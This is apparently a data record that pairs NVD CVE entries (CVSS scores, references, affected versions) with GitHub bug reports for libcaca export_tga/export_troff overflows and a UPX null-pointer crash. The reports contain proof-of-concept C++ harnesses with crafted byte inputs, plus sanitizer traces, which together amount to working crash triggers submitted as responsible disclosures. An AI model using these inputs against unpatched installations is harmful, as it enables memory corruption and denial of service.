"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1948675" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cacalabs/libcaca/issues/53" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00004.html" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6WFGYICNTMNDNMDDUV4G2RYFB5HNJCOV/" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PC7EGOEQ5C4OD66ZUJJIIYEXBTZOCMZX/" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZSBCRN6EGQJUVOSD4OEEQ6XORHEM2CUL/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1948675" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cacalabs/libcaca/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00004.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6WFGYICNTMNDNMDDUV4G2RYFB5HNJCOV/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PC7EGOEQ5C4OD66ZUJJIIYEXBTZOCMZX/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZSBCRN6EGQJUVOSD4OEEQ6XORHEM2CUL/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libcaca_project:libcaca:0.99:beta14:*:*:*:*:*:*", "matchCriteriaId": "557BE1CD-F6E8-4AA6-BD16-898290B17B06", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libcaca_project:libcaca:0.99:beta15:*:*:*:*:*:*", "matchCriteriaId": "62BEB6EC-8040-4E5D-90F2-8D0951CDC875", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libcaca_project:libcaca:0.99:beta16:*:*:*:*:*:*", "matchCriteriaId": "37A17C20-B1BE-4D5D-B5B8-FEA26100A9AF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libcaca_project:libcaca:0.99:beta17:*:*:*:*:*:*", "matchCriteriaId": "A4C0AEDC-2E3E-486E-AE0D-6FEE4E2B5762", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libcaca_project:libcaca:0.99:beta18:*:*:*:*:*:*", "matchCriteriaId": "46B8CE3A-84F7-4CD6-A4EA-05BB7B3D4C5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:libcaca_project:libcaca:0.99:beta19:*:*:*:*:*:*", "matchCriteriaId": "27B545C0-6311-4AD1-AC52-F9C86040A90B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/cacalabs/libcaca/issues/53
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cacalabs", "libcaca" ]
Hi libcaca Team When I use the libfuzz test library API, I found an overflow error. Here are the steps to reproduce and my running environment System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 libcaca version e4968ba Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library ```shell $ cd libcaca $ ./bootstrap $ ./configure $ make ``` or ```shell $ cd libcaca $ ./bootstrap $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" $ make ``` 3.Create the poc_tga.cc && build ```c++ #include "config.h" #include "caca.h" #include <assert.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fstream> #include <iostream> using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"tga",&len); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; return 0; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } ``` 4.compile poc_tga.cc ```shell clang++ -g poc_tga.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_tga ``` 5.Run poc_tga asan info: ``` ==1845495==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000022 at pc 0x7f905c1bf440 bp 0x7ffdb0a31310 sp 0x7ffdb0a31308 WRITE of size 1 at 0x603000000022 thread T0 #0 0x7f905c1bf43f in export_tga /home/hh/Downloads/libcaca/caca/codec/export.c:961:12 #1 0x7f905c1bf43f in caca_export_memory /home/hh/Downloads/libcaca/caca/codec/export.c:117:16 #2 0x4c6d46 in LLVMFuzzerTestOneInput /home/hh/Downloads/libcaca/poc_tga.cc:29:18 #3 0x4c6e1c in main /home/hh/Downloads/libcaca/poc_tga.cc:44:2 #4 0x7f905bc0e0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #5 0x41c39d in _start (/home/hh/Downloads/libcaca/poc_tga+0x41c39d) 0x603000000022 is located 0 bytes to the right of 18-byte region [0x603000000010,0x603000000022) allocated by thread T0 here: #0 0x494add in malloc (/home/hh/Downloads/libcaca/poc_tga+0x494add) #1 0x7f905c1be0eb in export_tga /home/hh/Downloads/libcaca/caca/codec/export.c:944:18 #2 0x7f905c1be0eb in caca_export_memory /home/hh/Downloads/libcaca/caca/codec/export.c:117:16 #3 0x4c6d46 in LLVMFuzzerTestOneInput /home/hh/Downloads/libcaca/poc_tga.cc:29:18 #4 0x4c6e1c in main /home/hh/Downloads/libcaca/poc_tga.cc:44:2 #5 0x7f905bc0e0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/export.c:961:12 in export_tga Shadow bytes around the buggy address: 0x0c067fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c067fff8000: fa fa 00 00[02]fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1845495==ABORTING ```
[ Security] heap-buffer-overflow of export.c in function export_tga
https://api.github.com/repos/cacalabs/libcaca/issues/53/comments
3
2021-04-07T02:31:14Z
2021-10-19T14:16:25Z
https://github.com/cacalabs/libcaca/issues/53
851,947,306
53
1,996
CVE-2021-30499
2021-05-27T00:15:08.440
A flaw was found in libcaca. A buffer overflow of export.c in function export_troff might lead to memory corruption and other potential consequences.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1948679" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cacalabs/libcaca/issues/54" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00004.html" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6WFGYICNTMNDNMDDUV4G2RYFB5HNJCOV/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PC7EGOEQ5C4OD66ZUJJIIYEXBTZOCMZX/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZSBCRN6EGQJUVOSD4OEEQ6XORHEM2CUL/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1948679" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cacalabs/libcaca/issues/54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2024/04/msg00004.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6WFGYICNTMNDNMDDUV4G2RYFB5HNJCOV/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PC7EGOEQ5C4OD66ZUJJIIYEXBTZOCMZX/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZSBCRN6EGQJUVOSD4OEEQ6XORHEM2CUL/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libcaca_project:libcaca:-:*:*:*:*:*:*:*", "matchCriteriaId": "BF4B6254-DA00-4B53-85A1-94773655D556", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/cacalabs/libcaca/issues/54
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cacalabs", "libcaca" ]
Hi libcaca Team When I use the libfuzz test library API, I found an overflow error. Here are the steps to reproduce and my running environment System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Fedora 33: clang 11.0.0 , gcc 10.2.1 libcaca version e4968ba6e93e9fd35429eb16895c785c51072015 Verification steps: 1.Get the source code of libcaca 2.Compile the libcaca.so library ```shell $ cd libcaca $ ./bootstrap $ ./configure $ make ``` or ```shell $ cd libcaca $ ./bootstrap $ ../configure CC="clang -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" CXX="clang++ -O2 -fno-omit-frame-pointer -g -fsanitize=address,fuzzer-no-link -fsanitize-coverage=bb" $ make ``` 3.Create the poc_troff.cc && build ```c++ #include "config.h" #include "caca.h" //#include "common-image.h" #include <assert.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fstream> #include <iostream> using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"troff",&len); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } ``` 4.compile poc_troff.cc ```shell clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff ``` 5.Run poc_troff asan info: ``` ==1845916==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f28d47e8140 at pc 0x7f28d46fb799 bp 0x7ffe8c4ce450 sp 0x7ffe8c4ce448 READ of size 8 at 0x7f28d47e8140 thread T0 #0 0x7f28d46fb798 in export_troff /home/hh/Downloads/libcaca/caca/codec/export.c:1029:48 #1 0x7f28d46fb798 in caca_export_memory /home/hh/Downloads/libcaca/caca/codec/export.c:120:16 #2 0x4c6d46 in LLVMFuzzerTestOneInput /home/hh/Downloads/libcaca/poc_troff.cc:29:18 #3 0x4c6e1c in main /home/hh/Downloads/libcaca/poc_troff.cc:44:2 #4 0x7f28d414a0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #5 0x41c39d in _start (/home/hh/Downloads/libcaca/poc_troff+0x41c39d) 0x7f28d47e8140 is located 0 bytes to the right of global variable 'ansi2troff' defined in 'codec/export.c:1015:33' (0x7f28d47e80c0) of size 128 SUMMARY: AddressSanitizer: global-buffer-overflow /home/hh/Downloads/libcaca/caca/codec/export.c:1029:48 in export_troff Shadow bytes around the buggy address: 0x0fe59a8f4fd0: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 0x0fe59a8f4fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f4ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f5000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f5010: 00 00 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 =>0x0fe59a8f5020: 00 00 00 00 00 00 00 00[f9]f9 f9 f9 00 00 00 00 0x0fe59a8f5030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f5040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f5050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f5060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe59a8f5070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1845916==ABORTING ```
[Security] global-buffer-overflow of export.c in function export_troff
https://api.github.com/repos/cacalabs/libcaca/issues/54/comments
2
2021-04-07T02:36:51Z
2021-04-22T09:59:05Z
https://github.com/cacalabs/libcaca/issues/54
851,949,481
54
1,997
CVE-2021-30500
2021-05-27T00:15:08.483
Null pointer dereference was found in upx PackLinuxElf::canUnpack() in p_lx_elf.cpp,in version UPX 4.0.0. That allow attackers to execute arbitrary code and cause a denial of service via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1948692" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/commit/90279abdfcd235172eab99651043051188938dcc" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/485" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1948692" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/upx/upx/commit/90279abdfcd235172eab99651043051188938dcc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/485" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D3527302-7874-4400-B123-99C1CA6FE8EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/upx/upx/issues/485
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
<!--- IF YOU REMOVE THIS TEMPLATE WE WILL CLOSE YOUR ISSUE WITHOUT RESPONSE. Just read it and fill in the details we're asking, it saves so much of our time. Thanks! --> ## What's the problem (or question)? Null pointer dereference was discovered in upx in the latest commit of the devel branch. [2638bee] During the pointer 'p' points to 0x0 in func get_ne32(). The issue can be triggered by different places, which can cause a denial of service. ASAN reports: ``` File size Ratio Format Name -------------------- ------ ----------- ----------- p_lx_elf.cpp:2406:54: runtime error: member access within null pointer of type 'const Elf64_Phdr' (aka 'const Phdr<ElfITypes<LE16, LE32, LE64, LE64, LE64>>') SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior p_lx_elf.cpp:2406:54 in AddressSanitizer:DEADLYSIGNAL ================================================================= ==3546154==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000082a541 bp 0x7fffe268e150 sp 0x7fffe268e140 T0) ==3546154==The signal is caused by a READ memory access. ==3546154==Hint: address points to the zero page. #0 0x82a541 in get_ne32(void const*) /home/upx/src/./bele.h:48:5 #1 0x82a541 in get_le32(void const*) /home/upx/src/./bele.h:136:50 #2 0x82a541 in N_BELE_RTP::LEPolicy::get32(void const*) const /home/upx/src/./bele_policy.h:168:48 #3 0x58717f in PackLinuxElf64::canUnpack() /home/upx/src/p_lx_elf.cpp:2406:38 #4 0x79c0e1 in try_unpack(Packer*, void*) /home/upx/src/packmast.cpp:114:20 #5 0x7955d2 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /home/upx/src/packmast.cpp:194:9 #6 0x79bdda in PackMaster::getUnpacker(InputFile*) /home/upx/src/packmast.cpp:248:18 #7 0x79c768 in PackMaster::unpack(OutputFile*) /home/upx/src/packmast.cpp:266:9 #8 0x82bd8c in do_one_file(char const*, char*) /home/upx/src/work.cpp:157:12 #9 0x82d684 in do_files(int, int, char**) /home/upx/src/work.cpp:269:13 #10 0x50e805 in upx_main(int, char**) /home/upx/src/main.cpp:1516:9 #11 0x510e85 in main /home/upx/src/main.cpp:1584:13 #12 0x7fbe9660a0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #13 0x41d93d in _start (/home/upx/upx.out+0x41d93d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/upx/src/./bele.h:48:5 in get_ne32(void const*) ==3546154==ABORTING ``` debug info ``` ── source:./bele.h+48 ──── 43 return v; 44 } 45 46 __acc_static_forceinline unsigned get_ne32(const void *p) { 47 upx_uint32_t v = 0; // p=0x00007fffffff9720 → 0x0000000000000000 → 48 upx_memcpy_inline(&v, p, sizeof(v)); 49 return v; 50 } 51 52 __acc_static_forceinline upx_uint64_t get_ne64(const void *p) { 53 upx_uint64_t v = 0; gef➤ bt [#0] 0x4ff4cf → get_ne32(p=0x0) [#1] 0x4ff4cf → get_le32(p=0x0) [#2] 0xa1417c → N_BELE_RTP::LEPolicy::get32(this=0x1704740 <N_BELE_RTP::le_policy>, p=0x0) [#3] 0x69bdf6 → Packer::get_te32(this=0x61b000000080, p=0x0) [#4] 0x60123b → PackLinuxElf64::canUnpack(this=0x61b000000080) [#5] 0x942adb → try_unpack(p=0x61b000000080, user=0x7fffffffbe10) [#6] 0x93856c → PackMaster::visitAllPackers(func=0x9425c0 <try_unpack(Packer*, void*)>, f=0x7fffffffbe10, o=0x7fffffffc4c8, user=0x7fffffffbe10) [#7] 0x942428 → PackMaster::getUnpacker(f=0x7fffffffbe10) [#8] 0x94359b → PackMaster::unpack(this=0x7fffffffc4b0, fo=0x7fffffffbf20) [#9] 0xa16d11 → do_one_file(iname=0x7fffffffdf7d "poc") gef➤ p *p Attempt to dereference a generic pointer. gef➤ p p $1 = (const void *) 0x0 ``` ## What should have happened? Decompress a crafted/suspicious file. ## Do you have an idea for a solution? This bug is coursed by `upx_memcpy_inline(&v, p, sizeof(v));` , the pointer isn't sanitized. Strengthen the sanitize of all pointer used in upx_memcpy_inline may helpful reduce the . ## How can we reproduce the issue? <!--- Provide unambiguous set of steps to reproduce this bug. Include code to reproduce, if relevant --> 1. compile upx with address-sanitize 2. execute cmd upx.out -d $PoC poc zipped [null_pointer_01_get32.zip](https://github.com/upx/upx/files/6268545/null_pointer_01_get32.zip) ## Please tell us details about your environment. <!--- Include as many relevant details about the environment you experienced the bug in --> * UPX version used (`upx --version`): ``` ./upx.out --version upx 4.0.0-git-2638bee3c0f7+ UCL data compression library 1.03 zlib data compression library 1.2.11 LZMA SDK version 4.43 ``` * Host Operating System and version: - OS: Ubuntu 20.04.2 LTS x86_64 * Host CPU architecture: - CPU: Intel i5-4590 (4) @ 3.700GHz * Target Operating System and version: same as Host * Target CPU architecture: same as Host reporter: chiba of Topsec alphalab
PackLinuxElf::canUnpack did not check for ELF input
https://api.github.com/repos/upx/upx/issues/485/comments
0
2021-04-07T02:45:58Z
2021-04-23T06:55:47Z
https://github.com/upx/upx/issues/485
851,952,822
485
1,998
CVE-2021-30501
2021-05-27T00:15:08.527
An assertion abort was found in upx MemBuffer::alloc() in mem.cpp, in version UPX 4.0.0. The flow allows attackers to cause a denial of service (abort) via a crafted file.
